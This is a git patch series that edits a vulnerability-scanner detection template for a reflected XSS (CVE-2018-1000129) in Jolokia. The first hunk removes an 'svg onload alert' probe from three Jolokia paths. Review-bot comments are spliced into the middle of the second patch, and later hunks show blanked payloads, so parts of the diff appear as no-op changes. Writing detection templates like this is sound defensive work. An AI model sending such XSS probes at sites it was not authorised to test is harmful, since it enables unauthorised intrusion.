From 211309301424169f38f7585f61f5380b4d98242f Mon Sep 17 00:00:00 2001
From: flag007 <66717990+flag007@users.noreply.github.com>
Date: Thu, 27 Aug 2020 20:27:47 +0800
Subject: [PATCH 1/3] Update CVE-2018-1000129.yaml

There are two problems with this payload, / means the path, add it cannot be detected correctly, in addition, it should not be url-encoded
---
 cves/CVE-2018-1000129.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index ebaf25b0e0..46ba8c2eec 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
@@ -8,9 +8,9 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
- - "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
- - "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
+ - "{{BaseURL}}/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
 matchers-condition: and
 matchers:
 - type: status
@@ -18,5 +18,5 @@ requests:
 - 200
 - type: word
 words:
- - ""
+ - ""
 part: body

From 10bc6dbef635ab759e739c630223c152cd3223b4 Mon Sep 17 00:00:00 2001
From: flag007 <66717990+flag007@users.noreply.github.com>
Date: Thu, 27 Aug 2020 20:32:15 +0800
Subject: [PATCH 2/3] Update CVE-2018-1000129.yaml

A single svg is prone to false positives, let me update the payload
---
 cves/CVE-2018-1000129.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index 46ba8c2eec..c1a75edf2a 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
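Review bot: The third `path` entry, `"{{BaseURL}}:8080/jolokia/read?mimeType=text/html"`, appends a fixed port to a variable that may already carry one, so a target supplied as scheme://host:port presumably expands to host:port:8080 and that request never reaches a listener; the line predates this commit but is rewritten here and again in PATCH 2/3 without addressing it. Either drop the hard-coded port and let the scan input name the port, or derive that one request from a host-level variable rather than `{{BaseURL}}`. Note that this rendering of the patch series has stripped the markup payload from the three new path strings (and from the `words` value in the second hunk), so what can be reviewed here is the URL structure, not the reflected string itself.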
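Review bot: The second hunk keeps detection as status 200 plus the reflected string in `part: body`, which never verifies the condition that makes this finding an XSS: that the `mimeType=text/html` parameter actually changed the response content type. Any 200 that echoes the request path into a non-HTML body (a JSON error object, for instance) satisfies both matchers, which is presumably the false-positive class the author then tries to address in PATCH 2 by changing the payload string; PATCH 3 keeps the same two matchers. A header matcher on the content type pins the exploitable condition independently of which payload string is chosen, and `matchers-condition: and` is already set so it composes with the existing checks. The `words` value is blank in this rendering of the patch, so the reflected string itself cannot be reviewed here.
```yaml
    matchers:
      # … unchanged: status matcher and body word matcher …
      - type: word
        part: header
        words:
          - "text/html"
```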
@@ -8,9 +8,9 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
 matchers-condition: and
 matchers:
 - type: status
@@ -18,5 +18,5 @@ requests:
 - 200
 - type: word
 words:
- - ""
+ - ""
 part: body

From 3ff2f585c5f9e7e873f043be0edb06d7014210c1 Mon Sep 17 00:00:00 2001
From: bauthard <8293321+bauthard@users.noreply.github.com>
Date: Sun, 30 Aug 2020 10:02:59 +0530
Subject: [PATCH 3/3] Update CVE-2018-1000129.yaml

---
 cves/CVE-2018-1000129.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index c1a75edf2a..c3c5808622 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
@@ -8,9 +8,9 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
- - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}/api/jolokia/read?mimeType=text/html"
+ - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html"
 matchers-condition: and
 matchers:
 - type: status
@@ -18,5 +18,5 @@ requests:
 - 200
 - type: word
 words:
- - ""
+ - ""
 part: body